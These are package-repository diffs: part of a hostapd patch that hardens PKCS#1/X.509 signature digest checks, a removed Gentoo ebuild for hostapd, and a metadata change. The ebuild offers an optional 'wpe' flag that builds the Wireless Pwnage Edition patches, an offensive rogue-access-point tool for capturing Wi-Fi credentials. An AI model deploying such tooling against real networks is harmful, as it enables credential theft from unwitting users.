+++ b/src/tls/pkcs1.c
@@ -244,6 +244,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
os_free(decrypted);
return -1;
}
+ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestInfo",
+ hdr.payload, hdr.length);
pos = hdr.payload;
end = pos + hdr.length;
@@ -265,6 +267,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
os_free(decrypted);
return -1;
}
+ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestAlgorithmIdentifier",
+ hdr.payload, hdr.length);
da_end = hdr.payload + hdr.length;
if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
@@ -273,6 +277,23 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
os_free(decrypted);
return -1;
}
+ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: Digest algorithm parameters",
+ next, da_end - next);
+
+ /*
+ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
+ * omit the parameters, but there are implementation that encode these
+ * as a NULL element. Allow these two cases and reject anything else.
+ */
+ if (da_end > next &&
+ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
+ !asn1_is_null(&hdr) ||
+ hdr.payload + hdr.length != da_end)) {
+ wpa_printf(MSG_DEBUG,
+ "PKCS #1: Unexpected digest algorithm parameters");
+ os_free(decrypted);
+ return -1;
+ }
if (!asn1_oid_equal(&oid, hash_alg)) {
char txt[100], txt2[100];
diff --git a/src/tls/x509v3.c b/src/tls/x509v3.c
index a8944dd..df337ec 100644
--- a/src/tls/x509v3.c
+++ b/src/tls/x509v3.c
@@ -1964,6 +1964,7 @@ int x509_check_signature(struct x509_certificate *issuer,
os_free(data);
return -1;
}
+ wpa_hexdump(MSG_MSGDUMP, "X509: DigestInfo", hdr.payload, hdr.length);
pos = hdr.payload;
end = pos + hdr.length;
@@ -1985,6 +1986,8 @@ int x509_check_signature(struct x509_certificate *issuer,
os_free(data);
return -1;
}
+ wpa_hexdump(MSG_MSGDUMP, "X509: DigestAlgorithmIdentifier",
+ hdr.payload, hdr.length);
da_end = hdr.payload + hdr.length;
if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
@@ -1992,6 +1995,23 @@ int x509_check_signature(struct x509_certificate *issuer,
os_free(data);
return -1;
}
+ wpa_hexdump(MSG_MSGDUMP, "X509: Digest algorithm parameters",
+ next, da_end - next);
+
+ /*
+ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
+ * omit the parameters, but there are implementation that encode these
+ * as a NULL element. Allow these two cases and reject anything else.
+ */
+ if (da_end > next &&
+ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
+ !asn1_is_null(&hdr) ||
+ hdr.payload + hdr.length != da_end)) {
+ wpa_printf(MSG_DEBUG,
+ "X509: Unexpected digest algorithm parameters");
+ os_free(data);
+ return -1;
+ }
if (x509_sha1_oid(&oid)) {
if (signature->oid.oid[6] != 5 /* sha-1WithRSAEncryption */) {
--
cgit v0.12


@ -1,275 +0,0 @@
# Copyright 1999-2022 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
inherit flag-o-matic systemd savedconfig toolchain-funcs
EXTRAS_VER="2.7-r2"
EXTRAS_NAME="${CATEGORY}_${PN}_${EXTRAS_VER}_extras"
DESCRIPTION="IEEE 802.11 wireless LAN Host AP daemon"
HOMEPAGE="https://w1.fi/ https://w1.fi/cgit/hostap/ https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe"
SRC_URI="https://dev.gentoo.org/~andrey_utkin/distfiles/${EXTRAS_NAME}.tar.xz"
S="${S}/${PN}"
if [[ ${PV} == 9999 ]]; then
inherit git-r3
EGIT_REPO_URI="https://w1.fi/hostap.git"
else
if [[ ${PV} =~ ^.*_p[0-9]{8}$ ]]; then
SRC_URI+=" https://dev.gentoo.org/~andrey_utkin/distfiles/${P}.tar.xz"
else
SRC_URI+=" https://w1.fi/releases/${P}.tar.gz"
fi
# Never stabilize snapshot ebuilds please
KEYWORDS="amd64 arm arm64 ~mips ppc x86"
fi
LICENSE="BSD"
SLOT="0"
IUSE="internal-tls ipv6 netlink sqlite +suiteb +wpe +wps"
DEPEND="
internal-tls? ( dev-libs/libtommath )
!internal-tls? ( dev-libs/openssl:0=[-bindist(-)] )
kernel_linux? (
net-wireless/wireless-regdb
>=dev-libs/libnl-3.2:3
)
netlink? ( net-libs/libnfnetlink )
sqlite? ( dev-db/sqlite:3 )"
RDEPEND="${DEPEND}"
BDEPEND="virtual/pkgconfig"
pkg_pretend() {
if use internal-tls; then
ewarn "internal-tls implementation is experimental and provides fewer features"
fi
}
src_unpack() {
# Override default one because we need the SRC_URI ones even in case of 9999 ebuilds
default
if [[ ${PV} == 9999 ]] ; then
git-r3_src_unpack
fi
}
src_prepare() {
# Allow users to apply patches to src/drivers for example,
# i.e. anything outside ${S}/${PN}
pushd ../ >/dev/null || die
default
#https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe
use wpe && eapply "${FILESDIR}/${P}-wpe.patch"
popd >/dev/null || die
sed -i -e "s:/etc/hostapd:/etc/hostapd/hostapd:g" \
"${S}/hostapd.conf" || die
}
src_configure() {
local CONFIG="${S}"/.config
restore_config "${CONFIG}"
if [[ -f "${CONFIG}" ]]; then
default
return 0
fi
# toolchain setup
echo "CC = $(tc-getCC)" > ${CONFIG} || die
# EAP authentication methods
echo "CONFIG_EAP=y" >> ${CONFIG} || die
echo "CONFIG_ERP=y" >> ${CONFIG} || die
echo "CONFIG_EAP_MD5=y" >> ${CONFIG} || die
if use suiteb; then
echo "CONFIG_SUITEB=y" >> ${CONFIG} || die
echo "CONFIG_SUITEB192=y" >> ${CONFIG} || die
fi
if use internal-tls ; then
echo "CONFIG_TLS=internal" >> ${CONFIG} || die
else
# SSL authentication methods
echo "CONFIG_DPP=y" >> ${CONFIG} || die
echo "CONFIG_EAP_FAST=y" >> ${CONFIG} || die
echo "CONFIG_EAP_MSCHAPV2=y" >> ${CONFIG} || die
echo "CONFIG_EAP_PEAP=y" >> ${CONFIG} || die
echo "CONFIG_EAP_PWD=y" >> ${CONFIG} || die
echo "CONFIG_EAP_TLS=y" >> ${CONFIG} || die
echo "CONFIG_EAP_TTLS=y" >> ${CONFIG} || die
echo "CONFIG_OWE=y" >> ${CONFIG} || die
echo "CONFIG_SAE=y" >> ${CONFIG} || die
echo "CONFIG_TLSV11=y" >> ${CONFIG} || die
echo "CONFIG_TLSV12=y" >> ${CONFIG} || die
fi
if use wps; then
# Enable Wi-Fi Protected Setup
echo "CONFIG_WPS=y" >> ${CONFIG} || die
echo "CONFIG_WPS2=y" >> ${CONFIG} || die
echo "CONFIG_WPS_UPNP=y" >> ${CONFIG} || die
echo "CONFIG_WPS_NFC=y" >> ${CONFIG} || die
einfo "Enabling Wi-Fi Protected Setup support"
fi
echo "CONFIG_EAP_IKEV2=y" >> ${CONFIG} || die
echo "CONFIG_EAP_TNC=y" >> ${CONFIG} || die
echo "CONFIG_EAP_GTC=y" >> ${CONFIG} || die
echo "CONFIG_EAP_SIM=y" >> ${CONFIG} || die
echo "CONFIG_EAP_AKA=y" >> ${CONFIG} || die
echo "CONFIG_EAP_AKA_PRIME=y" >> ${CONFIG} || die
echo "CONFIG_EAP_EKE=y" >> ${CONFIG} || die
echo "CONFIG_EAP_PAX=y" >> ${CONFIG} || die
echo "CONFIG_EAP_PSK=y" >> ${CONFIG} || die
echo "CONFIG_EAP_SAKE=y" >> ${CONFIG} || die
echo "CONFIG_EAP_GPSK=y" >> ${CONFIG} || die
echo "CONFIG_EAP_GPSK_SHA256=y" >> ${CONFIG} || die
einfo "Enabling drivers: "
# drivers
echo "CONFIG_DRIVER_HOSTAP=y" >> ${CONFIG} || die
einfo " HostAP driver enabled"
echo "CONFIG_DRIVER_WIRED=y" >> ${CONFIG} || die
einfo " Wired driver enabled"
echo "CONFIG_DRIVER_NONE=y" >> ${CONFIG} || die
einfo " None driver enabled"
einfo " nl80211 driver enabled"
echo "CONFIG_DRIVER_NL80211=y" >> ${CONFIG} || die
# epoll
echo "CONFIG_ELOOP_EPOLL=y" >> ${CONFIG} || die
# misc
echo "CONFIG_DEBUG_FILE=y" >> ${CONFIG} || die
echo "CONFIG_PKCS12=y" >> ${CONFIG} || die
echo "CONFIG_RADIUS_SERVER=y" >> ${CONFIG} || die
echo "CONFIG_IAPP=y" >> ${CONFIG} || die
echo "CONFIG_IEEE80211R=y" >> ${CONFIG} || die
echo "CONFIG_IEEE80211W=y" >> ${CONFIG} || die
echo "CONFIG_IEEE80211N=y" >> ${CONFIG} || die
echo "CONFIG_IEEE80211AC=y" >> ${CONFIG} || die
echo "CONFIG_IEEE80211AX=y" >> ${CONFIG} || die
echo "CONFIG_OCV=y" >> ${CONFIG} || die
echo "CONFIG_PEERKEY=y" >> ${CONFIG} || die
echo "CONFIG_RSN_PREAUTH=y" >> ${CONFIG} || die
echo "CONFIG_INTERWORKING=y" >> ${CONFIG} || die
echo "CONFIG_FULL_DYNAMIC_VLAN=y" >> ${CONFIG} || die
echo "CONFIG_HS20=y" >> ${CONFIG} || die
echo "CONFIG_WNM=y" >> ${CONFIG} || die
echo "CONFIG_FST=y" >> ${CONFIG} || die
echo "CONFIG_FST_TEST=y" >> ${CONFIG} || die
echo "CONFIG_ACS=y" >> ${CONFIG} || die
if use netlink; then
# Netlink support
echo "CONFIG_VLAN_NETLINK=y" >> ${CONFIG} || die
fi
if use ipv6; then
# IPv6 support
echo "CONFIG_IPV6=y" >> ${CONFIG} || die
fi
if use sqlite; then
# Sqlite support
echo "CONFIG_SQLITE=y" >> ${CONFIG} || die
fi
if use kernel_linux; then
echo "CONFIG_LIBNL32=y" >> ${CONFIG} || die
append-cflags $($(tc-getPKG_CONFIG) --cflags libnl-3.0)
fi
# TODO: Add support for BSD drivers
default
}
src_compile() {
emake V=1
if ! use internal-tls; then
emake V=1 nt_password_hash
emake V=1 hlr_auc_gw
fi
}
src_install() {
insinto /etc/${PN}
doins ${PN}.{conf,accept,deny,eap_user,radius_clients,sim_db,wpa_psk}
use wpe && doins "${FILESDIR}"/hostapd-int.conf "${FILESDIR}"/hostapd-ext.conf "${FILESDIR}/${P}"-wpe.conf
fperms -R 600 /etc/${PN}
if use wpe; then
newsbin ${PN} ${PN}-wpe
newbin ${PN}_cli ${PN}_cli-wpe
dosym ./${PN}-wpe /usr/sbin/${PN}
DESTDIR="${ED}" emake wpe
else
dosbin ${PN}
dobin ${PN}_cli
fi
if ! use internal-tls; then
dobin nt_password_hash hlr_auc_gw
fi
newinitd "${WORKDIR}/${EXTRAS_NAME}"/${PN}-init.d ${PN}
newconfd "${WORKDIR}/${EXTRAS_NAME}"/${PN}-conf.d ${PN}
systemd_dounit "${WORKDIR}/${EXTRAS_NAME}"/${PN}.service
doman ${PN}{.8,_cli.1}
dodoc ChangeLog README
use wps && dodoc README-WPS
docinto examples
dodoc wired.conf
insinto /etc/log.d/conf/services/
doins logwatch/${PN}.conf
exeinto /etc/log.d/scripts/services/
doexe logwatch/${PN}
save_config .config
}
pkg_postinst() {
einfo
einfo "If you are running OpenRC you need to follow this instructions:"
einfo "In order to use ${PN} you need to set up your wireless card"
einfo "for master mode in /etc/conf.d/net and then start"
einfo "/etc/init.d/${PN}."
einfo
einfo "Example configuration:"
einfo
einfo "config_wlan0=( \"192.168.1.1/24\" )"
einfo "channel_wlan0=\"6\""
einfo "essid_wlan0=\"test\""
einfo "mode_wlan0=\"master\""
einfo
#if [[ -e "${KV_DIR}"/net/mac80211 ]]; then
# einfo "This package now compiles against the headers installed by"
# einfo "the kernel source for the mac80211 driver. You should "
# einfo "re-emerge ${PN} after upgrading your kernel source."
#fi
if use wps; then
einfo "You have enabled Wi-Fi Protected Setup support, please"
einfo "read the README-WPS file in /usr/share/doc/${PF}"
einfo "for info on how to use WPS"
fi
}


@ -7,20 +7,18 @@
RADIUS Authentication client, RADIUS Accounting client
</longdescription>
<use>
<flag name="crda">Add CRDA support</flag>
<flag name="internal-tls">Use internal TLSv1 implementation instead of depending on OpenSSL, LibreSSL or GnuTLS</flag>
<flag name="logwatch">Install support files for
<pkg>sys-apps/logwatch</pkg></flag>
<flag name="netlink">Adding support for using netlink to create VLANs</flag>
<flag name="sqlite">Adding sqlite support</flag>
<flag name="suiteb">Enable CNSA/Suiteb cipher support</flag>
<flag name="wpe">Add support for Wireless Pwnage Edition patches</flag>
<flag name="wps">Add support for Wi-Fi Protected Setup</flag>
</use>
<maintainer type="person">
<email>andrey_utkin@gentoo.org</email>
<name>Andrey Utkin</name>
</maintainer>
<maintainer type="person">
<email>zerochaos@gentoo.org</email>
<name>Rick Farina</name>
<email>sidhayn@gmail.com</email>
<name>Zero_Chaos</name>
</maintainer>
<upstream>
<remote-id type="github">aircrack-ng/aircrack-ng</remote-id>
</upstream>
</pkgmetadata>